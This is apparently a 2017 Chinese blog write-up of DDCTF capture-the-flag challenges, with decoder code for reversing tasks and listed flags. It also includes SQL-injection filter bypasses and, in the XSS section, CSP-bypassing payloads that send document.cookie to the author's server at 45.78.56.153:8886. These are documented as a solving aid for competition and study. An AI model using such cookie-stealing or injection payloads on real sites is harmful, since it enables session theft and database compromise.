DDCTF
Aryb1n
5月 18, 2017
第一题[RE]
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main() {
int i = 0;
int j = 0;
char arr[100];
FILE * foutput = fopen("./data", "rb");
while (fread(&arr[j], sizeof(char), 1, foutput)) {
++j;
}
// (0000000100000CB0 - 0000000100000C90) >> 2 = 8
int v2 = 8 ^ arr[0];
for(i = 0; i < 55; i++) {
arr[i] -= 2;
arr[i] ^= v2;
v2++;
}
printf("%s\n", &arr[1]);
return 0;
}
// DDCTF-5943293119a845e9bbdbde5a369c1f50@didichuxing.com
第二题[apk]
public class d2 {
private static final byte[] p = { -40, -62, 107, 66, -126, 103, -56, 77, 122, -107, -24, -127, 72, -63, -98, 64, -24, -5, -49, -26, 79, -70, -26, -81, 120, 25, 111, -100, -23, -9, 122, -35, 66, -50, -116, 3, -72, 102, -45, -85, 0, 126, -34, 62, 83, -34, 48, -111, 61, -9, -51, 114, 20, 81, -126, -18, 27, -115, -76, -116, -48, -118, -10, -102, -106, 113, -104, 98, -109, 74, 48, 47, -100, -88, 121, 22, -63, -32, -20, -41, -27, -20, -118, 100, -76, 70, -49, -39, -27, -106, -13, -108, 115, -87, -1, -22, -53, 21, -100, 124, -95, -40, 62, -69, 29, 56, -53, 85, -48, 25, 37, -78, 11, -110, -24, -120, -82, 6, -94, -101 };
private static final byte[] q = { -57, -90, 53, -71, -117, 98, 62, 98, 101, -96, 36, 110, 77, -83, -121, 2, -48, 94, -106, -56, -49, -80, -1, 83, 75, 66, -44, 74, 2, -36, -42, -103, 6, -115, -40, 69, -107, 7, -32, -55, 56, 29, -18, 92, 106, -70, 82, -12, 4, -61, -85, 19, 34, 51, -26, -34, 126, -75, -42, -22, -79, -77, -61, -84, -92, 65, -81, 87, -94, 10, 84, 70, -8, -63, 26, 126, -76, -104, -123, -71, -126, -62, -23, 11, -39, 70, 14, 59, -101, -39, -124, 91, -109, 102, -49, 21, 105, 0, 37, -128, -57, 117, 110, -115, -86, 56, 25, -46, -55, 7, -125, 109, 76, 104, -15, 82, -53, 18, -28, -24 };
private static String i()
{
int j = 0;
byte[] arrayOfByte1 = new byte[p.length];
int i = 0;
while (i < arrayOfByte1.length)
{
arrayOfByte1[i] = ((byte)(p[i] ^ q[i]));
i += 1;
}
int k = arrayOfByte1[0];
i = 0;
while (arrayOfByte1[(k + i)] != 0) {
i += 1;
}
byte[] arrayOfByte2 = new byte[i];
while (j < i)
{
arrayOfByte2[j] = arrayOfByte1[(k + j)];
j += 1;
}
return new String(arrayOfByte2);
}
public static void main(String args[]){
System.out.println(i());
}
}
flag:
DDCTF-a3b8c0b9dbe94fa6bd0e8bfa95620751@didichuxing.com
第三题[RE]
不会做,好像是要脱壳
第四题[???]
传说中有钱人才能做得MAC题目
第五题[WEB,sqli]
过滤了空格 => %0a
过滤了逗号
- limit处 => limit 1 offset 4
- union处 => union select * from (select 1)a join (select 2)b...
都是师傅教的然后自己构造了一下
flag:
flag{DDCTF-88458a95f96c4dfea359d1de2b03bbdb@didichuxing.com}
几个资料不错
http://www.vuln.cn/6105 (wooyun http://drops.wooyun.org/tips/7883)
第七题[WEB,xss]
第一次做出来xss题目
这一题对xss没有任何过滤
但不能内联js,所以相当于利用上传
先用link来bypass这个CSP
// <link rel="prefetch" href="//45.78.56.153:8886/"> <!-- var n0t = document.createElement("link"); n0t.setAttribute("rel", "prefetch"); n0t.setAttribute("href", "http://45.78.56.153:8886/" + document.cookie); document.head.appendChild(n0t); // -->在vps上收到了地址,等下作为脚本
再次上传并且引入第一步里的脚本
<script src="http://114.215.24.14/t2/adm1n_r3ad_m3ssag3.php?hash=11b2054f2a3f28e43371b9008d66634d"></script>获取tips
/hit=c2V0Y29va2llKCJmbGFnIiwgImZsYWd7eHh4eHh4eHh4eHh4eHh4eH0iLCB0aW1lKCkrMzYwMDAwMDAsICIvdDIvZjFhZ18xc19oM3IzIik7
base64一下setcookie("flag", "flag{xxxxxxxxxxxxxxxx}", time()+36000000, "/t2/f1ag_1s_h3r3");想要获取
/t2/f1ag_1s_h3r3下的flag// <link rel="prefetch" href="//45.78.56.153:8886/"> <!-- var kk = document.getElementById('kk'); kk.onload = function () { var m = document.getElementById('kk').contentWindow; var n0t = document.createElement("link"); n0t.setAttribute("rel", "prefetch"); n0t.setAttribute("href", "http://45.78.56.153:8886/" + m.document.cookie); document.head.appendChild(n0t); } // -->vps上返回地址
http://114.215.24.14/t2/adm1n_r3ad_m3ssag3.php?hash=b4bc243e8536536b0ff97e9d8acc7918这次引入一个iframe,通过第三步中的脚本来把cookie发到vps上
<script src="http://114.215.24.14/t2/adm1n_r3ad_m3ssag3.php?hash=b4bc243e8536536b0ff97e9d8acc7918"></script> <iframe src="http://114.215.24.14/t2/f1ag_1s_h3r3" id="kk"> </iframe>获得flag
flag{DDCTF-82b6ac5623b04c8f823d29fa73875c9c@didichuxing.com};